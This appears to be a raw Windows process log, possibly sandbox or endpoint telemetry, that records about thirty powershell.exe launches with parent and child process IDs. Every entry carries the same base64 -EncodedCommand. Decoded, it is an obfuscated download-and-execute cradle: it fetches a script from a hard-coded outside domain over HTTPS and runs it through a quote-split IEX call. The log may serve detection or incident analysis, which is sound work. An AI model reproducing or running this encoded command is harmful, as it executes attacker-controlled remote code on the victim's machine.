"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
100
4872
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
101
4924
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
102
4948
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
103
4972
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
104
5012
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
105
5084
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
106
5112
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
107
4328
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
108
3252
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
109
3124
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
110
3088
powershell.exe
944
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
111
4428
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
112
1976
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
113
4624
powershell.exe
2816
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
114
3408
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
115
1508
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
116
3500
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
117
3580
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
118
4936
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
119
3716
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
120
5096
powershell.exe
1676
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
121
3396
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
122
4060
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
123
4576
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
124
4804
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
125
2448
powershell.exe
804
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
126
4064
powershell.exe
2804
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
127
4004
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
128
5168
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
129
5248
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
130
5304
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
131
5352
powershell.exe
2880
powershell.exe
